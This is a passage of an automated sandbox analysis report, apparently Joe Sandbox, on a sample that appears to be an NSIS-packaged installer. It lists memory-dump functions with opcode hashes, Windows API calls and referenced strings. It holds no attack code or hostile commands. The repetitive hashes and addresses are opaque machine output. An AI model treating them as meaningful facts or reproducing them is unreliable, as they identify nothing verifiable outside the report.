                            • Instruction ID: e68401433f16c96925820d49dbf4dd7149f88464c1e2d5c81ab8a2e962229bd7
                            • Opcode Fuzzy Hash: 748c0fb66457078698451619655c343de5802dc682ea6eb13cc7a4c67f7b1208
                            • Instruction Fuzzy Hash: 25012632A046444BCF108BBCDC005DDBB76EF8A330F144A72C891FB180DB269A658791
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 08880c339cd5f9ba677f89553f6f1073585599e21184e8e853e21fb29684142b
                            • Instruction ID: 393036b1f01d41dc46f690a870605708a71dfc5e0b37bd6878867f9a8a41b505
                            • Opcode Fuzzy Hash: 08880c339cd5f9ba677f89553f6f1073585599e21184e8e853e21fb29684142b
                            • Instruction Fuzzy Hash: 9C01B1357002548FE7559BBD8850B5E77E6DBCA724F24446AE00ADB341DA27DC438781
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bd9143d826124f105dbcfbcda805b6c7605cebd5f0e609824b212708d94b487d
                            • Instruction ID: 6d0ad47fba8839f51d36dd31a7dfd40ed02db31baf67eefcbe8141a3f8ee33b4
                            • Opcode Fuzzy Hash: bd9143d826124f105dbcfbcda805b6c7605cebd5f0e609824b212708d94b487d
                            • Instruction Fuzzy Hash: E301D4367002185BF714867CC455B5FB7D6CBCA720F14843AE90EC7341E9A6DC424781
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004779925.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_160000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 76e8c804bdb724104fab3628d9d14db6f28128ee683bee0c85d7bf6be4b1c2f1
                            • Instruction ID: ddde1d58969d99f62326804bd7c2a0d6be6337bfc9da51a8c8d4d372bd2ef965
                            • Opcode Fuzzy Hash: 76e8c804bdb724104fab3628d9d14db6f28128ee683bee0c85d7bf6be4b1c2f1
                            • Instruction Fuzzy Hash: 2C21E0B1D01219AFCB00CF9AD884B9EFBB4FB49310F10816AE518A7240C3B8A954CBE5
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004779925.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_160000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d549cbb21fda2eb909fc4224d014f6b81125217ec832b01b9d8627df634398ed
                            • Instruction ID: 1d8553d04089ddc4b6ad82b315dc8f690a69db18dec5696d1dd3aa68ba94de6d
                            • Opcode Fuzzy Hash: d549cbb21fda2eb909fc4224d014f6b81125217ec832b01b9d8627df634398ed
                            • Instruction Fuzzy Hash: 0A21E0B2D01219AFCB01CF9AD884ADEFFB4BF49310F50826AE518A7340C3796955CBA5
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004779925.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_160000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f740f692dfd01dfc23e5adde739b3d35a3b7606aedaf28b30eeb9d865da1efe8
                            • Instruction ID: 9716283d65954d8a6af485770852c23c86e60c11eb22924d9dfc528a6f5091b7
                            • Opcode Fuzzy Hash: f740f692dfd01dfc23e5adde739b3d35a3b7606aedaf28b30eeb9d865da1efe8
                            • Instruction Fuzzy Hash: DB014431A00215AFCF25EFB9884519EBBF5EB89356B18047AD406E7301EB36D891CB91
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004399420.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_ad000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 908666e225ba305d4f25252bfc0568f623bad3a9aac30852747bd9de3d2d41dc
                            • Instruction ID: df8c48fda59246c9815740d8e9a9de698641522693a1c428a8f2887174d86110
                            • Opcode Fuzzy Hash: 908666e225ba305d4f25252bfc0568f623bad3a9aac30852747bd9de3d2d41dc
                            • Instruction Fuzzy Hash: 95119075504280DFCB11CF54D5C4B15FFA2FB85314F24C6AAD84A4B656C33BD85ACB62
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5ac77614cba4ff5ca93b06bd00c57bf389ad03921113f722e347b08a757db5d1
                            • Instruction ID: a55a51f889fd1162ecabf728ead1ad50ef48a753d38acf1feda40f3ce70848c3
                            • Opcode Fuzzy Hash: 5ac77614cba4ff5ca93b06bd00c57bf389ad03921113f722e347b08a757db5d1
                            • Instruction Fuzzy Hash: 480188367141589BEB599AADCC207EF7AAB9BC9350F04407AD409E7284DE65CD0283D1
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 277b5dcf15a526577dc944989d42c5a7f83991e2d5097a58594cde89016d8eb4
                            • Instruction ID: c43702db49faf8855a343c08c20fd9a400016d2e973b4611a7995b19267628a2
                            • Opcode Fuzzy Hash: 277b5dcf15a526577dc944989d42c5a7f83991e2d5097a58594cde89016d8eb4
                            • Instruction Fuzzy Hash: 8701AD367005184BEB189A7DC454B0BB3DADBC9720F24883AE50EC7340EAA6DC424784
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1290f96d92a93325fb815297c556963be89cd4980393be17e2bbc5ddd023b2a3
                            • Instruction ID: 4e467acc8cbf1ef598b172ab3c3c5226aa6cc2a51014a8cb99165cb2db211d86
                            • Opcode Fuzzy Hash: 1290f96d92a93325fb815297c556963be89cd4980393be17e2bbc5ddd023b2a3
                            • Instruction Fuzzy Hash: 6F018C35B002549BE758DABD8890B1E73DADBCA670F14883AE10ADB340EA67DC4287C5
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004779925.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_160000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d9b46d51c31f38e560eb203531811c34509c6462e08c2b5ee806e7b62650e7ad
                            • Instruction ID: c2febca041d77186728931a6e297ed076b0c22640f3557eddb71fbda6951b0ce
                            • Opcode Fuzzy Hash: d9b46d51c31f38e560eb203531811c34509c6462e08c2b5ee806e7b62650e7ad
                            • Instruction Fuzzy Hash: 0201DB71A04254AFCB01DBB98C017AD7BE56F05310F2184BAD549DB282EB35CA52C7D1
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 70e63c69372b4f79204f922e2665651069f5b86a55e3f83337f9d3c1c78ec94e
                            • Instruction ID: aeccfed573540ce5b41b9271bb01573619567edbd964ec1f6136796d2032041f
                            • Opcode Fuzzy Hash: 70e63c69372b4f79204f922e2665651069f5b86a55e3f83337f9d3c1c78ec94e
                            • Instruction Fuzzy Hash: 9001C831F10328EBDB189AA5D841A8E7375FB89364F10443EE905FB341DB36ED159B90
                            APIs
                            • SetErrorMode.KERNEL32 ref: 00403231
                            • GetVersion.KERNEL32 ref: 00403237
                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040326A
                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032A6
                            • OleInitialize.OLE32(00000000), ref: 004032AD
                            • SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032C9
                            • GetCommandLineA.KERNEL32(0042EC00,NSIS Error,?,00000006,00000008,0000000A), ref: 004032DE
                            • CharNextA.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 0040331A
                            • GetTempPathA.KERNEL32(00000400,00436400,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403417
                            • GetWindowsDirectoryA.KERNEL32(00436400,000003FB,?,00000006,00000008,0000000A), ref: 00403428
                            • lstrcatA.KERNEL32(00436400,\Temp,?,00000006,00000008,0000000A), ref: 00403434
                            • GetTempPathA.KERNEL32(000003FC,00436400,00436400,\Temp,?,00000006,00000008,0000000A), ref: 00403448
                            • lstrcatA.KERNEL32(00436400,Low,?,00000006,00000008,0000000A), ref: 00403450
                            • SetEnvironmentVariableA.KERNEL32(TEMP,00436400,00436400,Low,?,00000006,00000008,0000000A), ref: 00403461
                            • SetEnvironmentVariableA.KERNEL32(TMP,00436400,?,00000006,00000008,0000000A), ref: 00403469
                            • DeleteFileA.KERNEL32(00436000,?,00000006,00000008,0000000A), ref: 0040347D
                              • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                              • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                              • Part of subcall function 004037CE: lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,75A83410), ref: 004038BE
                              • Part of subcall function 004037CE: lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                              • Part of subcall function 004037CE: GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038DC
                              • Part of subcall function 004037CE: LoadImageA.USER32(00000067,?,00000000,00000000,00008040,00435400), ref: 00403925
                              • Part of subcall function 004037CE: RegisterClassA.USER32(0042EBA0), ref: 00403962
                              • Part of subcall function 004036F4: CloseHandle.KERNEL32(FFFFFFFF,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF
                            • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040352B
                            • ExitProcess.KERNEL32 ref: 0040354C
                            • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403669
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403670
                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403688
                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A7
                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004036CB
                            • ExitProcess.KERNEL32 ref: 004036EE
                              • Part of subcall function 004056BC: MessageBoxIndirectA.USER32(0040A218), ref: 00405717
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                            • String ID: "$.tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                            • API String ID: 3776617018-3048946811
                            • Opcode ID: 4a6fde25bb1e4d16b9cf10e657b6eb7b054fa26bdd218ae18c73530f95597d45
                            • Instruction ID: 947ab88924f8c3b38e2aea5cfaab7316d1dfac26a51a196f62222c0ed64aafcd
                            • Opcode Fuzzy Hash: 4a6fde25bb1e4d16b9cf10e657b6eb7b054fa26bdd218ae18c73530f95597d45
                            • Instruction Fuzzy Hash: EEC1D470604741AAD7216F759E89B2F3EACAF45706F44053FF581B61E2CB7C8A058B2E
                            APIs
                            • GetDlgItem.USER32(?,000003F9), ref: 00404A5C
                            • GetDlgItem.USER32(?,00000408), ref: 00404A67
                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AB1
                            • LoadBitmapA.USER32(0000006E), ref: 00404AC4
                            • SetWindowLongA.USER32(?,000000FC,0040503B), ref: 00404ADD
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AF1
                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B03
                            • SendMessageA.USER32(?,00001109,00000002), ref: 00404B19
                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B25
                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B37
                            • DeleteObject.GDI32(00000000), ref: 00404B3A
                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B65
                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B71
                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C06
                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C31
                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C45
                            • GetWindowLongA.USER32(?,000000F0), ref: 00404C74
                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C82
                            • ShowWindow.USER32(?,00000005), ref: 00404C93
                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D90
                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DF5
                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E0A
                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E2E
                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E4E
                            • ImageList_Destroy.COMCTL32(?), ref: 00404E63
                            • GlobalFree.KERNEL32(?), ref: 00404E73
                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EEC
                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404F95
                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FA4
                            • InvalidateRect.USER32(?,00000000,?), ref: 00404FC4
                            • ShowWindow.USER32(?,00000000), ref: 00405012
                            • GetDlgItem.USER32(?,000003FE), ref: 0040501D
                            • ShowWindow.USER32(00000000), ref: 00405024
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                            • String ID: $M$N
                            • API String ID: 1638840714-813528018
                            • Opcode ID: 9b14bfcce48d0d769f086a49a0ef55ef456572940aa0dac0a86a005e500a94a8
                            • Instruction ID: 8b31743f23cd8b0b58ed2b5f291beccc42c2d4f26c41c681c3135c74bfbc6718
                            • Opcode Fuzzy Hash: 9b14bfcce48d0d769f086a49a0ef55ef456572940aa0dac0a86a005e500a94a8
                            • Instruction Fuzzy Hash: 9D027FB0A00209AFEB20DF55DD85AAE7BB5FB84314F14413AF610B62E1C7799D52CF58
                            APIs
                            • DeleteFileA.KERNEL32(?,?,75A83410,00436400,00000000), ref: 00405791
                            • lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,75A83410,00436400,00000000), ref: 004057D9
                            • lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,75A83410,00436400,00000000), ref: 004057FA
                            • lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,75A83410,00436400,00000000), ref: 00405800
                            • FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,75A83410,00436400,00000000), ref: 00405811
                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058BE
                            • FindClose.KERNEL32(00000000), ref: 004058CF
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 2035342205-1173974218
                            • Opcode ID: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
                            • Instruction ID: 3130a24326b3cf8508e32ba03364d00ecd767046abd4d032e56f6a736b511150
                            • Opcode Fuzzy Hash: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
                            • Instruction Fuzzy Hash: AD519131900A05EAEF217B618C85BAF7A78DF42314F14817FF841B61E2D73C4952EE69
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd
                            Similarity
                            • API ID:
                            • String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                            • API String ID: 0-1298971921
                            • Opcode ID: ddef6bf87dc04637dbfadae52ea43e828eb5d1e5f4dd89b98cb8d4dd66b60aea
                            • Instruction ID: b328d2b551ec1382f2047d98cb56c66e0f46249a25be08ab58497ad5f533b361
                            • Opcode Fuzzy Hash: ddef6bf87dc04637dbfadae52ea43e828eb5d1e5f4dd89b98cb8d4dd66b60aea
                            • Instruction Fuzzy Hash: 4F125B34A01319CFEB18DFA5C850B9EB7F2BF89350F20856AD40AAB255DB359D85CF80
                            APIs
                            • GetDlgItem.USER32(?,00000403), ref: 00405264
                            • GetDlgItem.USER32(?,000003EE), ref: 00405273
                            • GetClientRect.USER32(?,?), ref: 004052B0
                            • GetSystemMetrics.USER32(00000002), ref: 004052B7
                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052D8
                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052E9
                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052FC
                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040530A
                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040531D
                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040533F
                            • ShowWindow.USER32(?,00000008), ref: 00405353
                            • GetDlgItem.USER32(?,000003EC), ref: 00405374
                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405384
                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040539D
                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053A9
                            • GetDlgItem.USER32(?,000003F8), ref: 00405282
                              • Part of subcall function 00404074: SendMessageA.USER32(00000028,?,?,00403EA4), ref: 00404082
                            • GetDlgItem.USER32(?,000003EC), ref: 004053C5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005199,00000000), ref: 004053D3
                            • CloseHandle.KERNEL32(00000000), ref: 004053DA
                            • ShowWindow.USER32(00000000), ref: 004053FD
                            • ShowWindow.USER32(?,00000008), ref: 00405404
                            • ShowWindow.USER32(00000008), ref: 0040544A
                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040547E
                            • CreatePopupMenu.USER32 ref: 0040548F
                            • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004054A4
                            • GetWindowRect.USER32(?,000000FF), ref: 004054C4
                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DD
                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405519
                            • OpenClipboard.USER32(00000000), ref: 00405529
                            • EmptyClipboard.USER32 ref: 0040552F
                            • GlobalAlloc.KERNEL32(00000042,?), ref: 00405538
                            • GlobalLock.KERNEL32(00000000), ref: 00405542
                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405556
                            • GlobalUnlock.KERNEL32(00000000), ref: 0040556F
                            • SetClipboardData.USER32(?,00000000), ref: 0040557A
                            • CloseClipboard.USER32 ref: 00405580
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                            • String ID:
                            • API String ID: 590372296-0
                            • Opcode ID: e4850145c29fa6a118fc99cbce2f78c5114ccbb4892c913cd041fdaee94a6f36
                            • Instruction ID: f54484deaadc53d59d965fa3ad24bc50442bab3dbb2bc57f5e3c058b1bd1a4dd
                            • Opcode Fuzzy Hash: e4850145c29fa6a118fc99cbce2f78c5114ccbb4892c913cd041fdaee94a6f36
                            • Instruction Fuzzy Hash: 10A14871900608BFDB11AF61DE89AAF7F79FB08354F40403AFA41B61A0C7754E519F68
                            APIs
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BA7
                            • ShowWindow.USER32(?), ref: 00403BC4
                            • DestroyWindow.USER32 ref: 00403BD8
                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BF4
                            • GetDlgItem.USER32(?,?), ref: 00403C15
                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C29
                            • IsWindowEnabled.USER32(00000000), ref: 00403C30
                            • GetDlgItem.USER32(?,?), ref: 00403CDE
                            • GetDlgItem.USER32(?,00000002), ref: 00403CE8
                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403D02
                            • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403D53
                            • GetDlgItem.USER32(?,00000003), ref: 00403DF9
                            • ShowWindow.USER32(00000000,?), ref: 00403E1A
                            • EnableWindow.USER32(?,?), ref: 00403E2C
                            • EnableWindow.USER32(?,?), ref: 00403E47
                            • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403E5D
                            • EnableMenuItem.USER32(00000000), ref: 00403E64
                            • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403E7C
                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E8F
                            • lstrlenA.KERNEL32(0042A870,?,0042A870,00000000), ref: 00403EB9
                            • SetWindowTextA.USER32(?,0042A870), ref: 00403EC8
                            • ShowWindow.USER32(?,0000000A), ref: 00403FFC
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                            • String ID:
                            • API String ID: 184305955-0
                            • Opcode ID: f28a66a0d7b9129856a2e3a49e044433d573e82c372ccead841a979cc75b8fa5
                            • Instruction ID: 5f88be39a50f3dd075596c1c1d09af532afca629c850b085fe9e60943a8810da
                            • Opcode Fuzzy Hash: f28a66a0d7b9129856a2e3a49e044433d573e82c372ccead841a979cc75b8fa5
                            • Instruction Fuzzy Hash: B7C19171604605ABEB206F62DE45E2B3FBCEB4570AF40053EF642B11E1CB799942DB1D
                            APIs
                              • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                              • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                            • lstrcatA.KERNEL32(00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,75A83410,00436400,00435000,00000000), ref: 00403849
                            • lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,75A83410), ref: 004038BE
                            • lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                            • GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038DC
                            • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,00435400), ref: 00403925
                              • Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B
                            • RegisterClassA.USER32(0042EBA0), ref: 00403962
                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040397A
                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039AF
                            • ShowWindow.USER32(00000005,00000000), ref: 004039E5
                            • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 00403A11
                            • GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A1E
                            • RegisterClassA.USER32(0042EBA0), ref: 00403A27
                            • DialogBoxParamA.USER32(?,00000000,00403B6B,00000000), ref: 00403A46
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                            • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                            • API String ID: 1975747703-2904746566
                            • Opcode ID: 6eb3a8c6d4b6a1eb21d80e3e72b0c71cc60e502e6c5045bb4d9ce0f5c3d8f447
